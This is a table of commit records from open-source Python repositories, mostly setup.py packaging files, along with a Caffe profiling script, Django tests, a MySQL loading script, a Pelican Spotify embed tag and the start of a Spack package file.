commit
stringlengths 40
40
| subject
stringlengths 4
1.73k
| repos
stringlengths 5
127k
| old_file
stringlengths 2
751
| new_file
stringlengths 2
751
| new_contents
stringlengths 1
8.98k
| old_contents
stringlengths 0
6.59k
| license
stringclasses 13
values | lang
stringclasses 23
values |
---|---|---|---|---|---|---|---|---|
50e9d1f1f66c6fc4e549fa7084f0189e0805d58e
|
Add first version of setup.py
|
drdoctr/doctr,gforsyth/doctr_testing,doctrtesting/doctr
|
setup.py
|
setup.py
|
#!/usr/bin/env python
import sys
if sys.version_info < (3,5):
sys.exit("doctr requires Python 3.5 or newer")
from setuptools import setup
import versioneer
setup(
name='doctr',
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
description='''Deploy docs from Travis to GitHub pages.''',
author='Aaron Meurer and Gil Forsyth',
author_email='asmeurer@gmail.com',
url='https://github.com/gforsyth/doctr',
packages=['doctr'],
long_description="""
doctr
Deploy docs from Travis to GitHub pages.
License: MIT
""",
entry_points={'console_scripts': [ 'doctr = doctr.__main__:main']},
install_requires=[
'requests',
'cryptography',
],
license="MIT",
classifiers=[
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Topic :: Documentation',
'Topic :: Software Development :: Documentation',
],
zip_safe=False,
)
|
mit
|
Python
|
|
d9bfa5d255a9a2a3ab278f94f338d2147dcdd1db
|
Fix setup
|
betatim/BlackBox,ccauet/scikit-optimize,scikit-optimize/scikit-optimize,betatim/BlackBox,scikit-optimize/scikit-optimize
|
setup.py
|
setup.py
|
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
setup(name='scikit-optimize',
version='0.1',
description='Sequential model-based optimization toolbox.',
long_description=('Scikit-Optimize, or skopt, is a simple and efficient'
' library for sequential model-based optimization,'
' accessible to everybody and reusable in various'
' contexts.'),
url='https://scikit-optimize.github.io/',
license='BSD',
author='The scikit-optimize contributors',
packages=['skopt', 'skopt.learning', 'skopt.optimizer'],
install_requires=["numpy", "scipy", "scikit-learn>=0.18dev", "cython",
"matplotlib"]
)
|
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
setup(name='scikit-optimize',
version='0.1',
description='Sequential model-based optimization toolbox.',
long_description=('Scikit-Optimize, or skopt, is a simple and efficient'
' library for sequential model-based optimization,'
' accessible to everybody and reusable in various'
' contexts.'),
url='https://scikit-optimize.github.io/',
license='BSD',
author='The scikit-optimize contributors',
packages=['skopt', 'skopt.learning'],
install_requires=["numpy", "scipy", "scikit-learn>=0.18dev", "cython",
"matplotlib"]
)
|
bsd-3-clause
|
Python
|
e1d4cbbeab04e6c04b822073937ef19d7ec8e34a
|
add setup.py
|
joeymeyer/raspberryturk
|
setup.py
|
setup.py
|
#!/usr/bin/env python
from setuptools import setup, find_packages
setup(name='raspberryturk',
version='0.0.1',
description='Python package powering the Raspberry Turk chess-playing robot.',
author='Joey Meyer',
author_email='jmeyer41@gmail.com',
url='https://bitbucket.com/joeymeyer/raspberryturk',
packages=find_packages(),
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
'Programming Language :: Python :: 2.7'
]
)
|
mit
|
Python
|
|
a4f05ca4022a542dac45114a832991c6bfc93e4a
|
Remove setuptools dependence.
|
mromero107/sse,niwinz/sse
|
setup.py
|
setup.py
|
# -*- coding: utf-8 -*-
from distutils.core import setup
setup(
name = "sse",
url = "https://github.com/niwibe/sse",
author = "Andrei Antoukh",
author_email = "niwi@niwi.be",
version="1.1",
description = "Server-Sent Events protocol implemetation.",
py_modules = ['sse'],
classifiers = [
"Development Status :: 5 - Production/Stable",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.2",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: Implementation :: PyPy",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Environment :: Web Environment",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Software Development :: Libraries",
"Topic :: Utilities",
],
)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from setuptools import setup
description = """
"""
setup(
name = "sse",
url = "https://github.com/niwibe/sse",
author = "Andrei Antoukh",
author_email = "niwi@niwi.be",
version="1.0",
description = "Server Sent Events protocol implemetation.",
install_requires=['distribute'],
zip_safe=False,
py_modules = ['sse'],
classifiers = [
"Development Status :: 5 - Production/Stable",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.2",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: Implementation :: PyPy",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Environment :: Web Environment",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Software Development :: Libraries",
"Topic :: Utilities",
],
)
|
bsd-3-clause
|
Python
|
b30e1c560ecde7b2c949de42eceddf5c49c9ba01
|
add setup.py file
|
stroy1/localFoodLearner
|
setup.py
|
setup.py
|
from setuptools import setup
setup(
name="localFoodLearner",
version="0.0.1",
install_requires=[
"pandas",
"numpy",
]
)
|
mit
|
Python
|
|
7036801e6931c480a3eec611ed87f13e29a181bf
|
Bump version to 0.7.9
|
m-kiuchi/ouimeaux,m-kiuchi/ouimeaux,tomjmul/wemo,rgardner/ouimeaux,rgardner/ouimeaux,aktur/ouimeaux,sstangle73/ouimeaux,fujita-shintaro/ouimeaux,rgardner/ouimeaux,iancmcc/ouimeaux,fujita-shintaro/ouimeaux,bennytheshap/ouimeaux,drock371/ouimeaux,bennytheshap/ouimeaux,tomjmul/wemo,aktur/ouimeaux,fujita-shintaro/ouimeaux,sstangle73/ouimeaux,tomjmul/wemo,sstangle73/ouimeaux,aktur/ouimeaux,iancmcc/ouimeaux,iancmcc/ouimeaux,drock371/ouimeaux,m-kiuchi/ouimeaux,bennytheshap/ouimeaux,drock371/ouimeaux
|
setup.py
|
setup.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
here = lambda *a: os.path.join(os.path.dirname(__file__), *a)
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
if sys.argv[-1] == 'publish':
os.system('python setup.py sdist upload')
sys.exit()
readme = open(here('README.rst')).read()
history = open(here('HISTORY.rst')).read().replace('.. :changelog:', '')
requirements = [x.strip() for x in open(here('requirements.txt')).readlines()]
setup(
name='ouimeaux',
version='0.7.9',
description='Open source control for Belkin WeMo devices',
long_description=readme + '\n\n' + history,
author='Ian McCracken',
author_email='ian.mccracken@gmail.com',
url='https://github.com/iancmcc/ouimeaux',
packages=[
'ouimeaux',
],
package_dir={'ouimeaux': 'ouimeaux'},
include_package_data=True,
install_requires=requirements,
license="BSD",
zip_safe=False,
keywords='ouimeaux',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Topic :: Home Automation',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
"Programming Language :: Python :: 2",
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
],
entry_points={
'console_scripts': [
'wemo = ouimeaux.cli:wemo'
]
},
test_suite='tests',
)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
here = lambda *a: os.path.join(os.path.dirname(__file__), *a)
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
if sys.argv[-1] == 'publish':
os.system('python setup.py sdist upload')
sys.exit()
readme = open(here('README.rst')).read()
history = open(here('HISTORY.rst')).read().replace('.. :changelog:', '')
requirements = [x.strip() for x in open(here('requirements.txt')).readlines()]
setup(
name='ouimeaux',
version='0.8dev',
description='Open source control for Belkin WeMo devices',
long_description=readme + '\n\n' + history,
author='Ian McCracken',
author_email='ian.mccracken@gmail.com',
url='https://github.com/iancmcc/ouimeaux',
packages=[
'ouimeaux',
],
package_dir={'ouimeaux': 'ouimeaux'},
include_package_data=True,
install_requires=requirements,
license="BSD",
zip_safe=False,
keywords='ouimeaux',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Topic :: Home Automation',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
"Programming Language :: Python :: 2",
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
],
entry_points={
'console_scripts': [
'wemo = ouimeaux.cli:wemo'
]
},
test_suite='tests',
)
|
bsd-3-clause
|
Python
|
1cbe793a5260fcfe8e16462e224bcfc19125063c
|
add a setup.py
|
jonatron/django-admin-resumable-js,jonatron/django-admin-resumable-js,jonatron/django-admin-resumable-js
|
setup.py
|
setup.py
|
import os
from setuptools import setup
README = open(os.path.join(os.path.dirname(__file__), 'README.md')).read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name='django-admin-resumable-js',
version='0.1',
packages=['admin_resumable'],
include_package_data=True,
license='MIT License',
description='A Django app for the uploading of large files from the django admin site.',
long_description=README,
url='https://github.com/jonatron/django-admin-resumable-js',
author='Your Name',
author_email='jon4tron@gmail.com',
classifiers=[
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
|
mit
|
Python
|
|
2af222aed53f4cf799824b564ecd7e633d6356b8
|
add setup.py
|
amaxwell/datatank_py
|
setup.py
|
setup.py
|
from setuptools import setup
setup(
name = "datatank_py",
version = "0.1",
packages = [ "datatank_py" ],
install_requires = ['numpy>1.0'],
# package_data = {
# "" : [ "*.tank", "*.markdown", "*.txt" ]
# },
author = "Adam R. Maxwell",
author_email = "amaxwell@mac.com",
description = "Python modules for creating and modifying DataTank files",
license = "BSD",
)
|
bsd-3-clause
|
Python
|
|
a8b809a8f0f13bda454c2c78c08b35127bed16d6
|
Bump the patch version to 1.0.1.
|
maikelwever/django-redis-cache,chripede/django-redis-cache,carltongibson/django-redis-cache,maikelwever/django-redis-cache,carltongibson/django-redis-cache,chripede/django-redis-cache
|
setup.py
|
setup.py
|
from setuptools import setup
setup(
name="django-redis-cache",
url="http://github.com/sebleier/django-redis-cache/",
author="Sean Bleier",
author_email="sebleier@gmail.com",
version="1.0.1",
packages=["redis_cache", "redis_cache.backends"],
description="Redis Cache Backend for Django",
install_requires=['redis>=2.4.5'],
classifiers=[
"Programming Language :: Python",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.2",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Operating System :: OS Independent",
"Topic :: Software Development :: Libraries",
"Topic :: Utilities",
"Environment :: Web Environment",
"Framework :: Django",
],
)
|
from setuptools import setup
setup(
name="django-redis-cache",
url="http://github.com/sebleier/django-redis-cache/",
author="Sean Bleier",
author_email="sebleier@gmail.com",
version="1.0.0",
packages=["redis_cache", "redis_cache.backends"],
description="Redis Cache Backend for Django",
install_requires=['redis>=2.4.5'],
classifiers=[
"Programming Language :: Python",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.2",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Operating System :: OS Independent",
"Topic :: Software Development :: Libraries",
"Topic :: Utilities",
"Environment :: Web Environment",
"Framework :: Django",
],
)
|
bsd-3-clause
|
Python
|
2dc04229247f28c8c098f8e3e00341419a1ead1c
|
Add setup.py
|
mpkato/openliveq
|
setup.py
|
setup.py
|
# -*- coding:utf-8 -*-
from setuptools import setup
from setuptools.command.test import test as TestCommand
class PyTest(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
pytest.main(self.test_args)
setup(
name = "openliveq",
packages = ["openliveq"],
version = "0.0.1",
description = "Package for NTCIR-13 OpenLiveQ",
author = "Makoto P. Kato",
author_email = "kato@dl.kuis.kyoto-u.ac.jp",
license = "MIT License",
url = "https://github.com/mpkato/openliveq",
install_requires = [
'numpy'
],
tests_require=['pytest'],
cmdclass = {'test': PyTest}
)
|
mit
|
Python
|
|
926beaa12c0e17e949c362487014a6ec7521d654
|
Add distutils - setup.py
|
nabla-c0d3/sslyze
|
setup.py
|
setup.py
|
#!/usr/bin/env python
from sslyze import SSLYZE_VERSION, PROJECT_URL
from distutils.core import setup
setup(name='SSLyze',
version=SSLYZE_VERSION,
description='Fast and full-featured SSL scanner',
long_description=open('README.md').read(),
author_email='sslyze@isecpartners.com',
url=PROJECT_URL,
scripts=['sslyze.py'],
packages=['plugins', 'utils', 'utils.ctSSL'],
package_data={'plugins': ['data/mozilla_cacert.pem','data/mozilla_ev_oids.py']},
license=open('LICENSE.txt').read(),
)
|
agpl-3.0
|
Python
|
|
81ed734de508cb9dff61d2bc2703e54bda02067a
|
remove netifaces from package dependencies
|
lilchurro/vent,cglewis/vent,cglewis/vent,CyberReboot/vent,bpagon13/vent,lilchurro/vent,Jeff-Wang93/vent,Jeff-Wang93/vent,cglewis/vent,lilchurro/vent,bpagon13/vent,CyberReboot/vent,bpagon13/vent,Jeff-Wang93/vent,CyberReboot/vent
|
setup.py
|
setup.py
|
from setuptools import setup
setup(
name='vent',
version='v0.4.3.dev',
packages=['vent', 'vent.core', 'vent.core.file_drop',
'vent.core.rq_worker', 'vent.core.rq_dashboard', 'vent.menus',
'vent.core.rmq_es_connector', 'vent.helpers', 'vent.api'],
install_requires=['docker', 'npyscreen'],
scripts=['bin/vent'],
license='Apache License 2.0',
author='arpit',
author_email='',
maintainer='Charlie Lewis',
maintainer_email='clewis@iqt.org',
description=('A library that includes a CLI designed to serve as a'
' platform to collect and analyze data across a flexible set'
' of tools and technologies.'),
keywords='docker containers platform collection analysis tools devops',
url='https://github.com/CyberReboot/vent',
)
|
from setuptools import setup
setup(
name='vent',
version='v0.4.3.dev',
packages=['vent', 'vent.core', 'vent.core.file_drop',
'vent.core.rq_worker', 'vent.core.rq_dashboard', 'vent.menus',
'vent.core.rmq_es_connector', 'vent.helpers', 'vent.api'],
install_requires=['docker', 'netifaces', 'npyscreen'],
scripts=['bin/vent'],
license='Apache License 2.0',
author='arpit',
author_email='',
maintainer='Charlie Lewis',
maintainer_email='clewis@iqt.org',
description=('A library that includes a CLI designed to serve as a'
' platform to collect and analyze data across a flexible set'
' of tools and technologies.'),
keywords='docker containers platform collection analysis tools devops',
url='https://github.com/CyberReboot/vent',
)
|
apache-2.0
|
Python
|
5262ff764e09b7d8e20cce848a288968014e648e
|
Add setup.py
|
Suor/flaws
|
setup.py
|
setup.py
|
from setuptools import setup
setup(
name='iron',
version='0.0.1',
author='Alexander Schepanovski',
author_email='suor.web@gmail.com',
description='Iron out your python code.',
long_description=open('README.rst').read(),
url='http://github.com/Suor/iron',
license='BSD',
py_modules=['iron', 'astpp'],
install_requires=[
'funcy>=1.1',
],
entry_points = {
'console_scripts': [
'iron = iron:main',
],
},
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Environment :: Console',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Intended Audience :: Developers',
'Topic :: Software Development :: Quality Assurance',
'Topic :: Utilities',
'Topic :: Software Development :: Libraries :: Python Modules',
]
)
|
bsd-2-clause
|
Python
|
|
8dea7c6cc036e228c6a963413195d45f03a55850
|
add setup
|
Urucas/pip-check
|
setup.py
|
setup.py
|
from setuptools import setup
setup(scripts=['pip-check.py'])
|
mit
|
Python
|
|
4fe0efd61c848aa55e900031e5ae27bc3eb4b149
|
Add caffe profile tool.
|
myfavouritekk/TPN
|
tools/profiling/py_caffe_profiling.py
|
tools/profiling/py_caffe_profiling.py
|
#!/usr/bin/env python
import sys
import os
import argparse
import time
import numpy as np
if __name__ == '__main__':
parser = argparse.ArgumentParser('Time profiling of certain Caffe code.')
parser.add_argument('--caffe',
help='Path to caffe repository.')
parser.add_argument('--gpu', type=int, default=0,
help='GPU id. [0]')
parser.add_argument('--model',
help='Model prototxt.')
parser.add_argument('--weights',
help='Model parameter file (.caffemodel).')
parser.add_argument('--iterations', type=int, default=50,
help='Number of iterations. [50]')
parser.add_argument('--size', type=int, default=700,
help='Image size. [700]')
parser.add_argument('--num_roi', type=int, default=128,
help='Number of ROIs. [128]')
args = parser.parse_args()
# import caffe
sys.path.insert(0, os.path.join(args.caffe, 'python'))
print "Using caffe from {}".format(args.caffe)
try:
import caffe
except ImportError:
print "ImportError: {} seems not a caffe repository.".format(args.caffe)
sys.exit()
caffe.set_mode_gpu()
caffe.set_device(args.gpu)
net = caffe.Net(args.model, args.weights, caffe.TEST)
for i in xrange(args.iterations):
st = time.time()
size = args.size
num_roi = args.num_roi
net.blobs['data'].reshape(1, 3, size, size)
net.blobs['rois'].reshape(num_roi, 5)
net.forward()
print "Iter {}: {:.02f} s for forward.".format(
i+1, time.time() - st)
|
mit
|
Python
|
|
185851cfb4614ebe97f38a43c5e2eb9503ce5c6c
|
Add tests for model render methods
|
liu21st/masterfirefoxos,liu21st/masterfirefoxos,enng0227/masterfirefoxos,mozilla/masterfirefoxos,glogiotatidis/masterfirefoxos,craigcook/masterfirefoxos,liu21st/masterfirefoxos,enng0227/masterfirefoxos,mozilla/masterfirefoxos,glogiotatidis/masterfirefoxos,mozilla/masterfirefoxos,glogiotatidis/masterfirefoxos,craigcook/masterfirefoxos,enng0227/masterfirefoxos,liu21st/masterfirefoxos,glogiotatidis/masterfirefoxos,craigcook/masterfirefoxos,mozilla/masterfirefoxos,enng0227/masterfirefoxos,craigcook/masterfirefoxos
|
masterfirefoxos/base/tests.py
|
masterfirefoxos/base/tests.py
|
from django.test import SimpleTestCase
from feincms.module.medialibrary.models import MediaFile
from . import models
class TestYouTubeParagraphEntry(SimpleTestCase):
def test_render(self):
test_data = {'title': 'Test Title', 'text': 'test text',
'youtube_id': 'test youtube id'}
rendered = models.YouTubeParagraphEntry(**test_data).render()
for value in test_data.values():
self.assertTrue(value in rendered)
class TestMediaParagraphEntry(SimpleTestCase):
def test_render(self):
test_data = {'title': 'Test Title', 'text': 'test text'}
entry = models.MediaParagraphEntry(**test_data)
entry.mediafile = MediaFile()
entry.mediafile.get_absolute_url = lambda: 'test mediafile url'
rendered = entry.render()
self.assertTrue('test mediafile url' in rendered)
for value in test_data.values():
self.assertTrue(value in rendered)
class TestFAQEntry(SimpleTestCase):
def test_render(self):
test_data = {'question': 'test question', 'answer': 'test answer'}
rendered = models.FAQEntry(**test_data).render()
for value in test_data.values():
self.assertTrue(value in rendered)
|
mpl-2.0
|
Python
|
|
b476c117ccea275e415d83e51c92ee0dbab4f6f8
|
add db loading script
|
WangWenjun559/Weiss,WangWenjun559/Weiss,WangWenjun559/Weiss,WangWenjun559/Weiss,WangWenjun559/Weiss,WangWenjun559/Weiss,WangWenjun559/Weiss
|
mysql/load_entities.py
|
mysql/load_entities.py
|
"""
A scrpit to load entity into Database
Author: Ming
Usage:
python load_entities.py -source source -from 2015-01-01 -to 2016-01-01 -user username -pass password
"""
import MySQLdb as mdb
from datetime import date
from datetime import datetime
from dateutil.rrule import rrule, DAILY
import sys
import json
import argparse
datadir = '/home/mingf/data/'
source = 'imdb'
homedir = '/home/mingf/Weiss/'
module = 'mysql/'
start = date(2015, 1, 1)
end = date(2016, 1, 1)
release_date = ''
cfile = ''
efile = ''
dbname = ''
dbh = None
c = None
def _dict2tuple(entry):
return (entry['id'],
entry['source'],
entry['description'],
entry['url'],
entry['tid'],
entry['name']
)
def run():
with open(efile, 'r') as f:
data = json.load(f)
print "About to load", thisdate, "with", len(data), "entities"
if (len(data) == 0):
return
c.executemany(
"""INSERT INTO entity (id, source, description, url, tid, name)
VALUES (%s, %s, %s, %s, %s, %s)""",
map(_dict2tuple, data)
)
dbh.commit()
def _arg_parser():
parser = argparse.ArgumentParser(description='A script to load entity info into database.\nEx: python load_entities.py --source=imdb --start=2015-01-01 --end=2015-01-01 --user=ming --passwd=fang --db=test')
parser.add_argument('--source', dest='source', action='store', help='The source info, which would be used when openning cooresponding json file')
parser.add_argument('--start', dest='start', action='store', help='The start date, in form of YYYY-MM-DD')
parser.add_argument('--end', dest='end', action='store', help='The end date, in form of YYYY-MM-DD, The range is inclusive')
parser.add_argument('--user', dest='user', action='store', help='The user name of database')
parser.add_argument('--passwd', dest='passwd', action='store', help='The password of database')
parser.add_argument('--db', dest='dbname', action='store', help='The name of database')
results = parser.parse_args()
user = results.user
passwd = results.passwd
source = results.source
start = datetime.strptime(results.start, '%Y-%m-%d').date()
end = datetime.strptime(results.end, '%Y-%m-%d').date()
return
if __name__ == '__main__':
_arg_parser()
dbh = mdb.connect(host="localhost",
user=user,
passwd=passwd,
db=dbname)
c = dbh.cursor()
for dt in rrule(DAILY, dtstart = start, until = end):
thisdate = dt.strftime('%Y-%m-%d')
release_date = '%s,%s' % (thisdate, thisdate) ## the release date range to crawl
cfile = '%s%s_comments_%s.json' % (datadir, source, thisdate)
efile = '%s%s_entities_%s.json' % (datadir, source, thisdate)
run()
dbh.close()
|
apache-2.0
|
Python
|
|
a8e3570e373409cb442605218f1a6c936c518c5a
|
Add spotify liquid tag
|
lazycoder-ru/pelican-plugins,Xion/pelican-plugins,lazycoder-ru/pelican-plugins,talha131/pelican-plugins,if1live/pelican-plugins,kdheepak89/pelican-plugins,benjaminabel/pelican-plugins,jakevdp/pelican-plugins,gjreda/pelican-plugins,florianjacob/pelican-plugins,seandavi/pelican-plugins,phrawzty/pelican-plugins,ingwinlu/pelican-plugins,ziaa/pelican-plugins,jakevdp/pelican-plugins,xsteadfastx/pelican-plugins,mwcz/pelican-plugins,mortada/pelican-plugins,lele1122/pelican-plugins,MarkusH/pelican-plugins,gjreda/pelican-plugins,Xion/pelican-plugins,olgabot/pelican-plugins,lindzey/pelican-plugins,frickp/pelican-plugins,MarkusH/pelican-plugins,farseerfc/pelican-plugins,Samael500/pelican-plugins,pelson/pelican-plugins,UHBiocomputation/pelican-plugins,pestrickland/pelican-plugins,shireenrao/pelican-plugins,shireenrao/pelican-plugins,howthebodyworks/pelican-plugins,mitchins/pelican-plugins,lazycoder-ru/pelican-plugins,lindzey/pelican-plugins,joachimneu/pelican-plugins,pxquim/pelican-plugins,rlaboiss/pelican-plugins,if1live/pelican-plugins,joachimneu/pelican-plugins,pelson/pelican-plugins,benjaminabel/pelican-plugins,cmacmackin/pelican-plugins,danmackinlay/pelican-plugins,proteansec/pelican-plugins,frickp/pelican-plugins,lele1122/pelican-plugins,xsteadfastx/pelican-plugins,jakevdp/pelican-plugins,cmacmackin/pelican-plugins,publicus/pelican-plugins,MarkusH/pelican-plugins,cctags/pelican-plugins,howthebodyworks/pelican-plugins,UHBiocomputation/pelican-plugins,barrysteyn/pelican-plugins,amitsaha/pelican-plugins,jprine/pelican-plugins,mwcz/pelican-plugins,M157q/pelican-plugins,ingwinlu/pelican-plugins,Neurita/pelican-plugins,jfosorio/pelican-plugins,publicus/pelican-plugins,wilsonfreitas/pelican-plugins,pelson/pelican-plugins,M157q/pelican-plugins,mortada/pelican-plugins,mikitex70/pelican-plugins,jprine/pelican-plugins,florianjacob/pelican-plugins,clokep/pelican-plugins,amitsaha/pelican-plugins,karya0/pelican-plugins,seandavi/pelican-plugins,doctorwidget/pelican-plugins,jantman/pelica
n-plugins,Xion/pelican-plugins,yuanboshe/pelican-plugins,prisae/pelican-plugins,mortada/pelican-plugins,farseerfc/pelican-plugins,florianjacob/pelican-plugins,doctorwidget/pelican-plugins,kdheepak89/pelican-plugins,makefu/pelican-plugins,mortada/pelican-plugins,pxquim/pelican-plugins,proteansec/pelican-plugins,seandavi/pelican-plugins,proteansec/pelican-plugins,rlaboiss/pelican-plugins,benjaminabel/pelican-plugins,barrysteyn/pelican-plugins,jantman/pelican-plugins,talha131/pelican-plugins,ingwinlu/pelican-plugins,cmacmackin/pelican-plugins,talha131/pelican-plugins,ziaa/pelican-plugins,publicus/pelican-plugins,UHBiocomputation/pelican-plugins,benjaminabel/pelican-plugins,ziaa/pelican-plugins,clokep/pelican-plugins,andreas-h/pelican-plugins,farseerfc/pelican-plugins,farseerfc/pelican-plugins,makefu/pelican-plugins,makefu/pelican-plugins,goerz/pelican-plugins,cmacmackin/pelican-plugins,jakevdp/pelican-plugins,amitsaha/pelican-plugins,florianjacob/pelican-plugins,andreas-h/pelican-plugins,prisae/pelican-plugins,karya0/pelican-plugins,karya0/pelican-plugins,MarkusH/pelican-plugins,andreas-h/pelican-plugins,M157q/pelican-plugins,Samael500/pelican-plugins,prisae/pelican-plugins,farseerfc/pelican-plugins,xsteadfastx/pelican-plugins,shireenrao/pelican-plugins,rlaboiss/pelican-plugins,lindzey/pelican-plugins,mikitex70/pelican-plugins,wilsonfreitas/pelican-plugins,goerz/pelican-plugins,mikitex70/pelican-plugins,davidmarquis/pelican-plugins,gjreda/pelican-plugins,if1live/pelican-plugins,mwcz/pelican-plugins,cctags/pelican-plugins,mitchins/pelican-plugins,olgabot/pelican-plugins,Xion/pelican-plugins,pelson/pelican-plugins,pxquim/pelican-plugins,publicus/pelican-plugins,goerz/pelican-plugins,Samael500/pelican-plugins,amitsaha/pelican-plugins,joachimneu/pelican-plugins,clokep/pelican-plugins,doctorwidget/pelican-plugins,jantman/pelican-plugins,Neurita/pelican-plugins,xsteadfastx/pelican-plugins,jantman/pelican-plugins,jfosorio/pelican-plugins,Samael500/pelican-plugins,seandavi/pel
ican-plugins,cctags/pelican-plugins,pestrickland/pelican-plugins,davidmarquis/pelican-plugins,yuanboshe/pelican-plugins,ziaa/pelican-plugins,wilsonfreitas/pelican-plugins,gjreda/pelican-plugins,makefu/pelican-plugins,Neurita/pelican-plugins,pestrickland/pelican-plugins,danmackinlay/pelican-plugins,UHBiocomputation/pelican-plugins,Neurita/pelican-plugins,clokep/pelican-plugins,ingwinlu/pelican-plugins,kdheepak89/pelican-plugins,olgabot/pelican-plugins,shireenrao/pelican-plugins,lele1122/pelican-plugins,goerz/pelican-plugins,olgabot/pelican-plugins,jfosorio/pelican-plugins,yuanboshe/pelican-plugins,andreas-h/pelican-plugins,proteansec/pelican-plugins,phrawzty/pelican-plugins,karya0/pelican-plugins,mwcz/pelican-plugins,phrawzty/pelican-plugins,barrysteyn/pelican-plugins,talha131/pelican-plugins,talha131/pelican-plugins,lele1122/pelican-plugins,phrawzty/pelican-plugins,lazycoder-ru/pelican-plugins,yuanboshe/pelican-plugins,doctorwidget/pelican-plugins,frickp/pelican-plugins,prisae/pelican-plugins,howthebodyworks/pelican-plugins,danmackinlay/pelican-plugins,joachimneu/pelican-plugins,howthebodyworks/pelican-plugins,pxquim/pelican-plugins,wilsonfreitas/pelican-plugins,cctags/pelican-plugins,frickp/pelican-plugins,pestrickland/pelican-plugins,barrysteyn/pelican-plugins,lindzey/pelican-plugins,jfosorio/pelican-plugins,mitchins/pelican-plugins,danmackinlay/pelican-plugins,mikitex70/pelican-plugins,mortada/pelican-plugins,if1live/pelican-plugins,rlaboiss/pelican-plugins,MarkusH/pelican-plugins,kdheepak89/pelican-plugins,M157q/pelican-plugins,mitchins/pelican-plugins,davidmarquis/pelican-plugins,davidmarquis/pelican-plugins
|
liquid_tags/spotify.py
|
liquid_tags/spotify.py
|
"""
Spotify Tag
---------
This implements a Liquid-style spotify tag for Pelican,
based on the jekyll / octopress youtube tag [1]_
Syntax
------
{% spotify id %}
Example
-------
{% spotify 1HNZcRFlIKwHAJD3LxvX4d %}
Output
------
<iframe src='https://embed.spotify.com/?uri=spotify:track:1HNZcRFlIKwHAJD3LxvX4d' width='300' height='380' frameborder='0' allowtransparency='true'></iframe>
"""
import os
import re
from .mdx_liquid_tags import LiquidTags
SYNTAX = "{% spotify id %}"
SPOTIFY = re.compile(r'(\w+)(\s+(\d+)\s(\d+))?')
@LiquidTags.register('spotify')
def spotify(preprocessor, tag, markup):
spotify_id = None
match = SPOTIFY.search(markup)
if match:
groups = match.groups()
spotify_id = groups[0]
if spotify_id:
spotify_out = """
<iframe src='https://embed.spotify.com/?uri=spotify:track:{}'
width='300'
height='380'
frameborder='0'
allowtransparency='true'></iframe>""".format(spotify_id).strip()
else:
raise ValueError("Error processing input, "
"expected syntax: {0}".format(SYNTAX))
return spotify_out
#----------------------------------------------------------------------
# This import allows image tag to be a Pelican plugin
from liquid_tags import register
|
agpl-3.0
|
Python
|
|
958abe5b298f255df5e4aef94b12d647f1319650
|
Create new package (#6811)
|
tmerrick1/spack,matthiasdiener/spack,LLNL/spack,EmreAtes/spack,tmerrick1/spack,mfherbst/spack,krafczyk/spack,krafczyk/spack,EmreAtes/spack,mfherbst/spack,iulian787/spack,krafczyk/spack,krafczyk/spack,LLNL/spack,matthiasdiener/spack,EmreAtes/spack,matthiasdiener/spack,LLNL/spack,mfherbst/spack,tmerrick1/spack,tmerrick1/spack,mfherbst/spack,LLNL/spack,mfherbst/spack,EmreAtes/spack,iulian787/spack,krafczyk/spack,matthiasdiener/spack,iulian787/spack,iulian787/spack,matthiasdiener/spack,LLNL/spack,iulian787/spack,tmerrick1/spack,EmreAtes/spack
|
var/spack/repos/builtin/packages/py-pyani/package.py
|
var/spack/repos/builtin/packages/py-pyani/package.py
|
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
